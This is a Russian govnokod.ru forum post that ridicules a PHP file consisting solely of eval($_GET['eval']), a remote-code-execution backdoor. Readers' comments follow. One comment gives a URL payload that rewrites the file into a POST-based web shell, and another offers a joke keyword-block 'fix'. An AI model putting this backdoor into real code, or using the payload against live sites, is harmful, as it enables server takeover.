- 1
- 2
<?php
eval($_GET['eval']);
Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
+53
<?php
eval($_GET['eval']);
И это весь файл. Epic Fail.
test.php?eval=%24f%3Dfopen('test.php', 'w')%3Bfwrite(%24f%2C'%3C%3Fphp%20eval(%24_P OST(%22eval%22)%20%3F%3E'%3Bfclose(f)%3B
в описании http://httpd.apache.org/docs/2.2/mod/mod_dumpio.html заявлено логирование всего-го.
Вот ещё статья: http://www.cyberciti.biz/faq/apache-mod_dumpio-log-post-data/
Сам не пробовал.
fixed
fixed
А закрывающего ?> нет?
Помнится у меня была функция, достойная быть выложенной здесь, для парсинга Json-подобного дерьма, используемого исключительно внутри одной системы. Там тоже закрывающие фигурные скобки были необязательны.
дык вроде это нынче стандарт The closing ?> tag MUST be omitted from files containing only PHP.(c) PSR-3
if(strpos($_GET["eval"], "fopen") !== false)
{
echo "AХТУНГ";
// блокируем нарушителя
while(1){}
}
eval($_GET['eval']);
по мотивам http://govnokod.ru/1168
Тридцатисекундный бан.